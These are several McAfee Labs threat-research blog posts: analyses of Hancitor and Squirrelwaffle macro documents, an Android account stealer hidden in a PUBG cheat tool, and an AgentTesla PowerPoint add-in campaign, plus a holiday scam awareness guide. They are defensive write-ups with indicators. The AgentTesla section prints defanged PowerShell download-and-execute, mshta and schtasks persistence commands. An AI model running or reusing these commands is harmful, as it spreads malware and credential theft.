This blog focuses on the effectiveness of this newly observed technique and how it adds an extra layer of obfuscation to evade detection. 

Below (Figure 1) is the Geolocation based stats of Hancitor Malicious Doc observed by McAfee since September 2021 

Figure 1 – Geo stats of Hancitor MalDoc
Figure 1 – Geo stats of Hancitor MalDoc


  1. The victim will receive a Docusign-based phishing email.
  2. On clicking on the link (hxxp://mettlybothe.com/8/forum[.]php), a Word Document file is downloaded.
  3. On Enabling the macro content in Microsoft Word, the macro drops an embedded OLE, a password-protected macro-infected document file and launches it.
  4. This second Document file drops the main Hancitor DLL (Dynamic Link Library) payload.
  5. The DLL payload is then executed via rundll32.exe.
Figure 2 – Infection Chain
Figure 2 – Infection Chain


Malware authors send the victims a phishing email containing a link as shown in the below screenshot (Figure 3). The usual Docusign theme is used in this recent Hancitor wave. This phishing email contains a link to the original malicious word document. On clicking the link, the Malicious Doc file is downloaded.

Figure 3 – Phishing mail pretending to be DocuSign
Figure 3 – Phishing mail pretending to be DocuSign

Since the macros are disabled by default configuration, malware authors try to lure victims into believing that the file is from legitimate organizations or individuals and will ask victims to enable editing and content to start the execution of macros. The screenshot below (Figure 4) is the lure technique that was observed in this current wave.

Figure 4 – Document Face
Figure 4 – Document Face

As soon as the victim enables editing, malicious macros are executed via the Document_Open function.

There is an OLE object embedded in the Doc file. The screenshot below (Figure 5) highlights the object as an icon.

Figure 5 – OLE embedded object marked inside red circle
Figure 5 – OLE embedded object marked inside the red circle

The loader VBA function, invoked by document_open, calls this random function (Figure 6), which moves the selection cursor to the exact location of the OLE object using the selection methods (.MoveDown, .MoveRight, .MoveTypeBackspace). Using the Selection.Copy method, it will copy the selected OLE object to the clipboard. Once it is copied in the clipboard it will be dropped under %temp% folder.

Figure 6 – VBA Function to Copy content to Clipboard
Figure 6 – VBA Function to Copy content to Clipboard

When an embedded object is being copied to the clipboard, it gets written to the temp directory as a file. This method is used by the malware author to drop a malicious word document instead of explicitly writing the file to disk using macro functions like the classic FileSystemObject.

In this case, the file was saved to the %temp% location with filename name “zoro.kl” as shown in the below screenshot (Fig 8). Fig 7 shows the corresponding procmon log involving the file write event.

Figure 7 – ProcMon log for the creation and WriteFile of “zoro.kl” in %temp% folder
Figure 7 – ProcMon log for the creation and WriteFile of “zoro.kl” in %temp% folder
Figure 8 – “zoro.kl” in %temp% location
Figure 8 – “zoro.kl” in %temp% location

Using the CreateObject(“Scripting.FileSystemObject”) method, the malware moves the file to a new location \Appdata\Roaming\Microsoft\Templates and renames it to “zoro.doc”.

Figure 9– VBA Function to rename and move the dropped Doc file
Figure 9– VBA Function to rename and move the dropped Doc file

This file is then opened with the built-in document method, Documents.open. This moved file, zoro.doc, is password-protected. In this case, the password used was “doyouknowthatthegodsofdeathonlyeatapples?”. We have also seen the usage of passwords likedonttouchme”, etc.

Figure 10 – VBA Function to password protect the Doc file
Figure 10 – VBA Function to password protect the Doc file

This newly dropped doc is executed using the Documents.Open function (Figure 11).

Figure 11 – VBA methods present inside “zoro.doc”
Figure 11 – VBA methods present inside “zoro.doc”

Zoro.doc uses the same techniques to copy and drop the next payload as we saw earlier. The only difference is that it has a DLL as the embedded OLE object.

It drops the file in the %temp% folder using clipboard with the name “gelforr.dap”. Again, it moves gelforr.dap DLL file to \Appdata\Roaming\Microsoft\Templates (Figure 12).

Figure 12 - Files dropped under the \Appdata\Roaming\Microsoft\Template folder
Figure 12 – Files dropped under the \Appdata\Roaming\Microsoft\Template folder

Finally, after moving DLL to the templates folder, it is executed using Rundll32.exe by another VBA call.


Technique ID Tactic Technique details
T1566.002 Initial Access Spam mail with links
T1204.001 Execution User Execution by opening the link.
T1204.002 Execution Executing downloaded doc
T1218 Defense Evasion Signed Binary Execution Rundll32
T1071 C&C (Command & Control) HTTP (Hypertext Transfer Protocol) protocol for communication


IOC (Indicators Of Compromise)

Type SHA-256 Scanner Detection Name
Main Doc 915ea807cdf10ea4a4912377d7c688a527d0e91c7777d811b171d2960b75c65c WSS W97M/Dropper.im
Dropped Doc c1c89e5eef403532b5330710c9fe1348ebd055d0fe4e3ebbe9821555e36d408e WSS W97M/Dropper.im


Dropped DLL d83fbc9534957dd464cbc7cd2797d3041bd0d1a72b213b1ab7bccaec34359dbb WSS RDN/Hancitor
URLs (Uniform Resource Locator) hxxp://mettlybothe.com/8/forum[.]php WebAdvisor Blocked


The post HANCITOR DOC drops via CLIPBOARD appeared first on McAfee Blog.

✇McAfee Blogs

‘Tis the Season for Scams

By: Abhishek Karnik

Co-authored by: Sriram P and Deepak Setty

‘Tis the season for scams. Well, honestly, it’s always scam season somewhere. In 2020, the Internet Crime and Complaint Center (IC3) reported losses in excess of $4.1 billion dollars in scams which was a 69% increase over 2019. There is no better time for a scammer celebration than Black Friday, Cyber Monday, and the lead-up to Christmas and New Year. It’s a predictable time of the year, which gives scammers ample time to plan and organize. The recipe isn’t complicated, at the base we have some holiday excitement, sprinkle in fake shopping deals and add some discounts, and ho ho ho we have social engineering scams.

In this blog, we want to increase awareness related to scams as we expect elevated activity during this holiday season. The techniques used to scam folks are very similar to those used to spread malware too, so always be alert and use caution when browsing and shopping online. We will provide some examples to help educate consumers on how to identify scams. The victims of such scams can be others around you like your kids or parents, so read up and spread the word with family and friends. Awareness, education, and being alert are key to keeping you at bay from fraudsters.

Relevant scams this season

Although there is a myriad of scams out there, we expect the most common scams and targets this season to be:

  1. Non-delivery scams – Fake online stores will attempt to get you to purchase items that you will never end up receiving
  2. Deals that get shoppers excited. Supply chain issues recently will give scammers more fodder. Scammers can place bait deals on popular items
  3. Elderly parents/grandparents looking for cheap medical equipment, medical memberships, or looking to purchase and ship their grandchildren presents for the holidays.
  4. Emotionally vulnerable people might fall prey to romance scams
  5. Children looking for free, Fortnite Vbucks and other gaming credits may fall prey to scams and could even get infected with potentially unwanted programs
  6. Charity scams will be rampant.

SMSishing, email-based Phishing, and push notifications will be the most common vectors initiating scams during this holiday season. Here are some common tactics in use today:

1. Unbelievable deals or discounts

This is a common theme around this time of the year. Deals, discounts, and gift cards can be costly to your bank account. Be wary of URLs being presented to you over email or SMS. Phishing emails, bulk mailing, texting, and typo-squatting are some of the ways that scammers target their prey.

2. Creating a sense of urgency

Scammers will create a sense of urgency by telling you that you have limited time to claim the deal or that there is low inventory for popular items in their store. It’s not difficult for scammers to identify sought-after electronics items or holiday gifts for sale and offer them for sale on their fake stores. Such scams are believable given the supply chain challenges and delivery shortages over the last few months.

3. Utilizing Scare tactics

Getting people worried about a life-changing event or disrupting travel plans can be concerning. So, if you get an unexpected call from someone claiming to be from the FBI, police, IRS, or even a travel company, stop and think. They may be using scare tactics to dupe you. Never divulge personal information and if in doubt, ask them a lot of directed questions and fact check them. As an example, check to see if they know your home address, account number, itinerary number, or bank balance depending on who they claim to be. Scammers typically don’t have specific details and when put on the spot, they’ll hang up.

4. Emotional tactics

Like scare tactics, scammers may prey on vulnerable people. Although there can be many variations of such scams, the more common ones are Romance Scams where you end up connecting to someone with a fake profile, and Fake Charity Scams where you receive a phone call or an email requesting a donation. Do not entertain such requests over the phone especially if you receive a phone call soliciting a donation. During the conversation, they will attempt to make you feel guilty or selfish for not contributing enough. Remember, there is no rush to donate. Go to a reputable website or a known organization and donate if you must after due diligence.

Tips to identify a scam

Successful scams are situationally accurate. You may be the smartest guy in the room, but when you eagerly waiting for that delivery and you see an email update claiming a delivery delay from UPS, you might fall for a scam. This is particularly true in the holiday season and therefore such themes are more prevalent. Here are some tips on how to identify scams early on.

  1. Be suspicious of anything that is pushed to you from an unknown source – emails, SMS, advertisements, phone calls, surveys, social media. This is when you are being solicited to do something you might not have otherwise chosen to
    1. Avoid going to unknown websites to begin with. You always have the option to r before you click on a link. You can always use some of the following trusted free resources to validate a domain or business
      1. https://trustedsource.org/ – to look up a URL
      2. https://www.virustotal.com/gui/home/url – to look up a URL
      3. https://www.bbb.org/ – to validate a business, charity, etc
      4. https://whois.domaintools.com/ – to look up site history. A new or recent domain is less trustworthy. Scammers register new domains based on the theme of their scams.
    2. If you do end up navigating, look for the following to build trust in a link:
      1. Ensure it’s an “https” domain versus an “http”. A valid “https” certificate just means that your data is encrypted enroute to the website. Although this method isn’t indicative of a scam, some scams are hosted on compromised “http” sites. (example 1))
      2. Closely look at the domain name. They might be indicative of fakes. Scammers would typically register domains with very similar names to deceive you. For example, Amazon.com could be replaced by Arnazon.com or AMAZ0N.com. ‘vv’ could be replaced for ‘w’, ‘I’ for a 1, etc. Same goes for emails you receive – take a close look
      3. Another common way of reaching a fake website is due to “typosquatting” but this is typically human error, where a user may type an incorrect domain name and reach a fake site.
      4. Most legit sites will have a “Contact us”, “About Us”, “Conditions of Use”, “Privacy Notice”/”Terms”, “Help”, Social Media presence on Twitter, FB, Instagram, etc. Read up on the pages to learn about the website and even look for website reviews before you make a purchase. Fake websites do not invest a lot of time to populate these – this could be a giveaway.
    3. Always confirm the sender of and email or text by validating the email address or phone number. For example, if an email claims to be from BankOfAmerica, you would expect their email domain in most cases to be from “@bankofamerica.com” and not from “@gmail.com”. Avoid clicking on links from emails or messages when you don’t know the sender.
    4. If you end up linking to a page because of an email or message, never provide personal details. Any site asking for such information should raise red flags. Even if the site looks legit, Phishing scammers make exact replicas of web pages and try to get you to login. This allows them to steal your login credentials. (Example 4)
    5. Don’t feel pressured to click on a link or provide details to solicitors in such cases especially. Any attempt to gather personal data is a big NO.
    6. Never open attachments from unknown people. Emails with document attachments or PDF Attachments are very popular in spreading malware. The attachment names are typically very enticing to click on. Names like “invoice.pdf”, “receipt.doc”, “Covid-19 test results.doc”, etc. may invite some curiosity but could also lead to malware.
    7. Ensure you review the hyperlink before you click them. It’s easy to fake the text and get you to an illegit page (Example 2)
    8. Anyone who insists on payments using a pre-paid gift card or wire transfer, instead of your typical credit card is most likely attempting to scam you.
  1. The end goal of a scammer is that they want to make money – so be alert with your cards and their activity.
    1. Avoid using Debit Cards online. Use a prepaid or virtual Credit Card or even better utilize Apple Pay, Google Pay or PayPal for online payments. Payment card services today have advanced fraud monitoring systems
    2. Check CC statements often to look for any unanticipated charges.
    3. If you make a purchase, ensure you have a tracking number and monitor shipments
    4. Disable international purchases if you know you won’t be traveling.
    5. Never wire money directly to anyone you do not know.

What if you are a victim?

If you believe that you have been a victim of a scam, here are a few tips that might help.

  1. First, get in touch with your Credit Card company and tell them to put a hold on your card. You can dispute any suspicious charges and request an issue of a chargeback
  2. If you have been scammed through popular sites like ebay.com or amazon.com – contact them directly. If you wired money, contact the wire company directly
  3. File a Police Report. If you gave your personal information away, you might want to go to
    1. US – https://www.identitytheft.gov/
    2. UK – www.cifas.org.uk
  4. Notify and contribute – build awareness
    1. US
      1. https://reportfraud.ftc.gov/#/?pid=A – (877) 382-4357
      2. https://www.bbb.org/
      3. https://www.ic3.gov/
      4. https://www.fbi.gov/scams-and-safety
    2. UK
      1. https://www.actionfraud.police.uk/ – 0300 123 2040
      2. https://www.gov.uk/find-local-trading-standards-office
      3. https://www.citizensadvice.org.uk/

Example scams:

Example 1: Fake SMS messages

It’s become more common recently to receive text messages for scammers. The following few text messages demonstrate SMSishing attempts.

  1. The first is an attempt to gather Bank Of America details. For the scammer, it’s a shot in the dark. Given, the target is a US number, he attempts to use the phone number that he is sending the text to, as a bank account number and provides a link to a bit.ly page (a URL shortening service) to link to a fake page that poses as a Bank of America login. A successful SMSish would be if the victim entered their details.


2. The following are fake texts that attempt to entice you click the link. The bait is the Gift card. One can tell that they are a similar theme since they originate from fake phone numbers, which are very similar but not exact. The domain names of the two URLs are totally random (probably compromised URLs). You can tell that back in October, the full URL based SMShing attempts were not very effective which is why in Nov, they probably used keywords like “COSTCO” and “ebay” within the URL and inline to their SMS context, to make it more likely for people to click.

Also note that some of the URLs only have an “http” versus a “https”, something we had noted earlier in the blog.

Example 2: Fake email link

One cannot trust an email by the text. You should review the link to ensure it takes you to where it claims to. The following is an example email where the link is not what it claims to be.

Example 3: Fake Store Scam hosted on Shopify

Shopify is a Canadian multinational e-commerce company. It offers online retailers a suite of services, including payments, marketing, shipping, and customer engagement tools.

So, where there is money to be made, individuals are looking to take advantage. Shopify scam targets both consumers and business owners. Scammer abuse the power of e-commerce to earn money by implementing fake stores. They observe the product or category, create an attractive logo or image and promote extensively on social media.

Fake Bike Online Purchase store – Mountain-ranger-com

Site: hxxps://mountain-ranger-com.myshopify.com/collections/all

SSL info:

This site is hosted on Shopify, so it has a valid SSL cert which is the first thing we check on where we transact.

Whois Record ( last updated on 2021-11-19 )

Domain Name: myshopify.com
Registry Domain ID: 362759365_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2021-03-02T23:39:12+0000
Creation Date: 2006-03-03T03:01:37+0000
Registrar Registration Expiration Date: 2024-03-02T08:00:00+0000
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.2083895770
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registrant Organization: Shopify Inc.
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Select Request Email Format

The registrar info for the site is valid too, as it is hosted on Shopify. If you look closer, however, one will notice red flags:

  1. Compare these prices listed on other known sites like amazon: Price listed on the fake site versus price listed on Amazon. This is an “unbelievable” deal.

Examples of similar sites showing incredible discounts.

2. The “About Us” doesn’t make much sense when you see the products that are being offered:

A quick google on the text shows that multiple sites are using the same exact text (most of them probably fake)

3. There are no customer reviews about the products listed.

4. It has a public email server (gmail) in its return policy

5. Looking up the list address in google maps wouldn’t show up anything and looking up the number in apps like true caller shows it’s fake.

Example 4: Social Engineering to Steal Credentials

The goal of this scam is to steal credentials however it could as well be used as a malware delivery mechanism. The screenshot is that of a fake business proposal hosted on OneDrive Cloud for phishing purposes.

The actor aims to mislead the user into clicking on the above reference link. When the user clicks on the link, it redirects to a different website that displays the below fake OneDrive screenshot.


If a user enters their OneDrive details, the actors receive them at their backend. This means that this victim has lost their login credentials to the phishing actors. Look at the address bar and trust your instincts. This is in no way related to Microsoft OneDrive. There are other such examples where they do some additional plumbing of the URL to include keywords that make it more believable – as they did in the SMSishing example above.

Example 5: Fake Push Notification for surveys

The goal here is to get the user to accept push notifications. Doing so makes the customer susceptible to other possible scams. In this example, the scammers attempt to get users to fill out surveys. Legit companies online pay users for surveys. A referral code is used to pay the survey taker. The scammer in this case attempts to get others to fill the survey on their behalf and therefore makes money when such surveys use the scammer’s referral code. Push notifications are used to get the victims to fill out surveys. Previous blogs from McAfee demonstrate similar scams and how to prevent such notifications

The initial vector comes to the victim via a spam email with a PDF Spam attachment. In this scenario, Gmail was used as the sender.

Upon opening the PDF, a fake online PUBG (Players Unknown Battleground) credits generator gets opened. In PUBG, Gamers need credits to participate in various online games and so this scam baits them offering free credits.

Once the user clicks on the bait URL, it opens a google feed proxy URL.

Malicious websites are destined to be block-listed and therefore have short shelf lives. Google’s feed proxy redirects them in adapting to new URLs and therefore utilizes a fast-flux mechanism as a technique to keep the campaign alive. Usage of feed proxy are not new and we have highlighted its use in the past by the hancitor botnet.

Clicking on the top highlighted URL, it navigates to a webpage that poses as a PUBG Arcane online credit generator.

To make the online generator look real, the website has added fake recent activities highlighting coins users have earned via this generator. Even the add comments section is fake.

Clicking on continue will bring up a fake progress bar. Now the site shows the coins and cash are ready, however, an automated human verification has failed, and a survey has to be taken up for getting the reward.

A clickable link for this verification is also loaded. Once clicked, a small dialog with 3 options are presented.

Clicking on “want to become a millionaire” loaded a survey page and prompts you to take it up. It will also prompt you to allow push notifications from this website.

Once you click on “Allow”, notifications to take up a survey or fake personalized offer notifications start popping up. Be it on your desktop or on your mobile, these notifications pop-ups to take up more surveys.

Clicking on the other links too from “Human Verification”, you will realize that you have finally ended up not gaining anything for your PUBG Arcane gaming, but ended up taking surveys.

Here is another example of a PDF theme we have seen as a lure on the Lenovo tablet offer.

Clicking on this link takes the user to a page that claims it has been protected by a technique to block bots. Persuading you to click on the allow button for enabling popups.

Once you click on the enable button, it then redirects the browser to take up a random survey. In our case, the survey was on household income.

Another such theme that we observed was around the latest Netflix series – Squid games. Although Series 1 has currently been released, the fake email prompts early access to Season 2.

Scammers spend a lot of time and effort tweaking and tuning their schemes to make it fit just right for you. Avoiding a scam is not full proof but being vigilant is key. Don’t get overly keen when you get offers thrown at you this season. Take a step back, relax and think it through, not only should you do your own research, but you should also trust your instincts. Spending a little extra on products or making donations to a reputable and known organization might be worth the peace of mind during the holidays. Help educate your family and contribute by reporting scams.

Happy Holidays!

The post ‘Tis the Season for Scams appeared first on McAfee Blog.

✇McAfee Blogs

The Newest Malicious Actor: “Squirrelwaffle” Malicious Doc.

By: McAfee Labs

Authored By Kiran Raj

Due to their widespread use, Office Documents are commonly used by Malicious actors as a way to distribute their malware. McAfee Labs have observed a new threat “Squirrelwaffle” which is one such emerging malware that was observed using office documents in mid-September that infects systems with CobaltStrike.

In this Blog, we will have a quick look at the SquirrelWaffle malicious doc and understand the Initial infection vector.

Geolocation based stats of Squirrelwaffle malicious doc observed by McAfee from September 2021


Figure1- Geo based stats of SquirrelWaffle Malicious Doc
Figure1- Geo-based stats of SquirrelWaffle Malicious Doc


Infection Chain

  1. The initial attack vector is a phishing email with a malicious link hosting malicious docs
  2. On clicking the URL, a ZIP archived malicious doc is downloaded
  3. The malicious doc is weaponized with AutoOpen VBA function. Upon opening the malicious doc, it drops a VBS file containing obfuscated powershell
  4. The dropped VBS script is invoked via exe to download malicious DLLs
  5. Thedownloaded DLLs are executed via exe with an argument of export function “ldr
Figure-2: Infection Chain
Figure-2: Infection Chain

Malicious Doc Analysis

Here is how the face of the document looks when we open the document (figure 3). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

Figure-3: Image of Word Document Face
Figure-3: Image of Word Document Face

UserForms and VBA

The VBA Userform Label components present in the Word document (Figure-4) is used to store all the content required for the VBS file. In Figure-3, we can see the userform’s Labelbox “t2” has VBS code in its caption.

Sub routine “eFile()” retrieves the LabelBox captions and writes it to a C:\Programdata\Pin.vbs and executes it using cscript.exe

Cmd line: cmd /c cscript.exe C:\Programdata\Pin.vbs

Figure-4: Image of Userforms and VBA
Figure-4: Image of Userforms and VBA

VBS Script Analysis

The dropped VBS Script is obfuscated (Figure-5) and contains 5 URLs that host payloads. The script runs in a loop to download payloads using powershell and writes to C:\Programdata location in the format /www-[1-5].dll/. Once the payloads are downloaded, it is executed using rundll32.exe with export function name as parameter “ldr

Figure-5: Obfuscated VBS script
Figure-5: Obfuscated VBS script

De-obfuscated VBS script

VBS script after de-obfuscating (Figure-6)

Figure-6: De-obfuscated VBS script
Figure-6: De-obfuscated VBS script


Different techniques & tactics are used by the malware and we mapped these with the MITRE ATT&CK platform.

  • Command and Scripting Interpreter (T-1059)

Malicious doc VBA drops and invokes VBS script.

CMD: cscript.exe C:\ProgramData\pin.vbs


  • Signed Binary Proxy Execution (T1218)

Rundll32.exe is used to execute the dropped payload

CMD: rundll32.exe C:\ProgramData\www1.dll,ldr


Type Value Scanner Detection Name
Main Word Document 195eba46828b9dfde47ffecdf61d9672db1a8bf13cd9ff03b71074db458b6cdf ENS,





Downloaded DLL


85d0b72fe822fd6c22827b4da1917d2c1f2d9faa838e003e78e533384ea80939 ENS,


URLs to download DLL ·       priyacareers.com

·       bussiness-z.ml

·       cablingpoint.com

·       bonus.corporatebusinessmachines.co.in

·       perfectdemos.com

WebAdvisor Blocked



The post The Newest Malicious Actor: “Squirrelwaffle” Malicious Doc. appeared first on McAfee Blog.

✇McAfee Blogs

Social Network Account Stealers Hidden in Android Gaming Hacking Tool

By: McAfee Labs

Authored by: Wenfeng Yu

McAfee Mobile Research team recently discovered a new piece of malware that specifically steals Google, Facebook, Twitter, Telegram and PUBG game accounts. This malware hides in a game assistant tool called “DesiEsp” which is an assistant tool for PUBG game available on GitHub. Basically, cyber criminals added their own malicious code based on this DesiEsp open-source tool and published it on Telegram. PUBG game users are the main targets of this Android malware in all regions around the world but most infections are reported from the United States, India, and Saudi Arabia. 

What is an ESP hack? 

ESP Hacks, (short for Extra-Sensory Perception) are a type of hack that displays player information such as HP (Health Points), Name, Rank, Gun etc. It is like a permanent tuned-up KDR/HP Vision. ESP Hacks are not a single hack, but a whole category of hacks that function similarly and are often used together to make them more effective. 

How can you be affected by this malware? 

After investigation, it was found that this malware was spread in the channels related to PUBG game on the Telegram platform. Fortunately, this malware has not been found on Google Play. 

Figure 1. Re-packaged hacking tool distributed in Telegram
Figure 1. Re-packaged hacking tool distributed in Telegram

Main dropper behavior 

This malware will ask the user to allow superuser permission after running: 

Figure 2. Initial malware requesting root access. 
Figure 2. Initial malware requesting root access.

If the user denies superuser request the malware will say that the application may not work: 

Figure 3. Error message when root access is not provided 
Figure 3. Error message when root access is not provided

When it gains root permission, it will start two malicious actions. First, it will steal accounts by accessing the system account database and application database.  

Figure 4. Get google account from android system account database.
Figure 4. Get a Google account from the Android system account database.

Second, it will install an additional payload with package name com.android.google.gsf.policy_sidecar_aps” using the “pm install” command. The payload package will be in the assets folder, and it will disguise the file name as “*.crt” or “*.mph”. 

Figure 5. Payload disguised as a certificate file (crt extension) 
Figure 5. Payload disguised as a certificate file (crt extension)

Stealing social and gaming accounts 

The dropped payload will not display icons and it does not operate directly on the screen of the user’s device. In the apps list of the system settings, it usually disguises the package name as something like “com.google.android.gsf” to make users think it is a system service of Google. It runs in the background in the way of Accessibility Service. Accessibility Service is an auxiliary function provided by the Android system to help people with physical disabilities use mobile apps. It will connect to other apps like a plug-in and can it access the Activity, View, and other resources of the connected app. 

The malware will first try to get root permissions and IMEI (International Mobile Equipment Identity) code that later access the system account database. Of course, even if it does not have root access, it still has other ways to steal account information. Finally, it also will try to activate the device-admin to difficult its removal. 

Methods to steal account information 

The first method to steal account credentials that this malware uses is to monitor the login window and account input box text of the stolen app through the AccessibilityService interface to steal account information. The target apps include Facebook (com.facebook.kakana), Twitter (com.twitter.android), Google (com.google.android.gms) and PUBG MOBILE game (com.tencent.ig) 

The second method is to steal account information (including account number, password, key, and token) by accessing the account database of the system, the user config file, and the database of the monitored app. This part of the malicious code is the same as the parent sample above: 

Figure 6. Malware accessing Facebook account information using root privileges 
Figure 6. Malware accessing Facebook account information using root privileges

Finally, the malware will report the stolen account information to the hacker’s server via HTTP.  

Gaming users infected worldwide 

PUBG games are popular all over the world, and users who use PUBG game assistant tools exist in all regions of the world. According to McAfee telemetry data, this malware and its variants affect a wide range of countries including the United States, India, and Saudi Arabia:  

Figure 7. Top affected countries include USA, India and Saudi Arabia
Figure 7. Top affected countries include USA, India , and Saudi Arabia


The online game market is revitalizing as represented by e-sports. We can play games anywhere in various environments such as mobiles, tablets, and PCs (personal computers). Some users will be looking for cheat tools and hacking techniques to play the game in a slightly advantageous way. Cheat tools are inevitably hosted on suspicious websites by their nature, and users looking for cheat tools must step into the suspicious websites. Attackers are also aware of the desires of such users and use these cheat tools to attack them. 

This malware is still constantly producing variants that use several ways to counter the detection of anti-virus software including packing, code obfuscation, and strings encryption, allowing itself to infect more game users. 

McAfee Mobile Security detects this threat as Android/Stealer and protects you from this malware attack. Use security software on your device. Game users should think twice before downloading and installing cheat tools, especially when they request Superuser or accessibility service permissions. 

Indicators of Compromise 

Dropper samples 












Payload samples 











The post Social Network Account Stealers Hidden in Android Gaming Hacking Tool appeared first on McAfee Blog.

✇McAfee Blogs

Malicious PowerPoint Documents on the Rise

By: McAfee Labs

Authored by Anuradha M

McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla which is a well-known password stealer. These spam emails purport to be related to financial transactions.  

AgentTesla is a RAT (Remote Access Trojan) malware that has been active since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to steal user credentials and other information from victims through screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns. 

During Q2, 2021, we have seen an increase in PowerPoint malware. 

Figure 1. Trend of PPT malware over the first half of 2021
Figure 1. The trend of PPT malware over the first half of 2021

In this campaign, the spam email contains an attached file with a .ppam extension which is a PowerPoint file containing VBA code. The sentiment used was finance-related themes such asNew PO300093 Order as shown in Figure 2. The attachment filename is 300093.pdf.ppam”. 

Figure 2. Spam Email

PPAM file: 

This file type was introduced in 2007 with the release of Microsoft Office 2007. It is a PowerPoint macro-enabled Open XML add-in file. It contains components that add additional functionality, including extra commands, custom macros, and new tools for extending default PowerPoint functions.  

Since PowerPoint supports ‘add-ins’ developed by third parties to add new features, attackers abuse this feature to automatically execute macros. 

Technical Analysis: 

Once the victim opens the “.ppam” file, a security notice warning pop-up as shown in Figure 3 to alert the user about the presence of macro.

Figure 3. Warning when opening the attached PowerPoint file
Figure 3. Warning when opening the attached PowerPoint file

From Figure 4, you can see that the Add-in feature of the PowerPoint can be identified from the content of [Content_Types].xml file which will be present inside the ppam file. 

Figure 4. Powerpoint add-in feature with macroEnabled
Figure 4. Powerpoint add-in feature with macroEnabled

 The PPAM file contains the following files and directories which can be seen upon extraction. 

  • _rels\.rels 
  • [Content_Types].xml 
  • ppt\rels\presentation.xml.rels 
  • ppt\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file 
  • ppt\presentation.xml 

Once the victim enables the macro, the add-in gets installed silently without user knowledge, which can be seen in Figure 5. On seeing that there is no content and no slide in the PowerPoint, the user will close the file but, in the backend, macro code gets executed to initiate the malicious activity. 

Figure 5. Installed Add-ins in the PowerPoint options
Figure 5. Installed Add-ins in the PowerPoint options

As you can see in Figure 6, the macro is executed within the add-in auto_open() event i.e.., macro is fired immediately after the presentation is opened and the add-in is loaded. 

Figure 6.VBA Code snippet with auto_open() event
Figure 6.VBA Code snippet with auto_open() event

The PowerPoint macro code on execution launches an URL by invoking mshta.exe (Microsoft HTML Application) which is shown in Figure 7. The mshta process is launched by Powerpoint by calling the CreateProcessA() API. 

Below are the parameters passed to CreateProcessA() API: 

kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D, 

Figure 7. VBA Code snippet containing mshta and url
Figure 7. VBA Code snippet containing mshta and url

Below is the command line parameter of mshta: 

mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh 

The URL hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” but it didn’t get any response from “27.html” at the time of analysis. 

Later mshta.exe spawns powershell.exe as a child process. 

Below is the command line parameters of PowerShell: 

powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‘) -useB); 

PowerShell downloads and executed script files from the above-mentioned URLs.  

The below Figure 8 shows the content of the first url – “hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt”: 

Figure 8. Binary file content
Figure 8. Binary file content

There are two binary files stored in two huge arrays inside each downloaded PowerShell file. The first file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs mentioned in the command line, decodes it, and launches MSBuild.exe to inject the payload within itself. 

Schedule Tasks: 

To achieve persistence, it creates a scheduled task in “Task Scheduler” and drops a task file under C:\windows\system32\SECOTAKSA to make the entire campaign work effectively.   

Figure 9. Code snippet to create a new schedule task
Figure 9. Code snippet to create a new scheduled task

The new task name is SECOTAKSA”. Its action is to execute the command mshta hxxp:// //1230948%[email protected]/p/27.html” and it’s called every 80 minutes.  

Below is the command line parameters of schtasks: 

schtasks.exe - “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://1230948%[email protected]/p/27.html\“” 

Infection Chain: 

Figure 10. Infection Chain
Figure 10. Infection Chain

Process Tree: 

Figure 11. Process Tree
Figure 11. Process Tree


McAfee’s Endpoint Security (ENS) and Windows Systems Security (WSS) product have  DAT coverage for this variant of malware. 

This malicious PPAM document with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as “W97M/Downloader.dkw”.  

The PPAM document is also blocked by the AMSI feature in ENS as AMSI-FKN! 

Additionally, the Exploit Prevention feature in McAfee’s Endpoint Security product blocks the infection chain of this malware by adding the below expert rule so as to protect our customers from this malicious attack. 

Expert Rule authored based on the below infection chain: 

POWERPNT.EXE –> mshta.exe  

Expert Rule: 

Rule { 

  Process { 

    Include OBJECT_NAME { -v “powerpnt.exe” } 


  Target { 

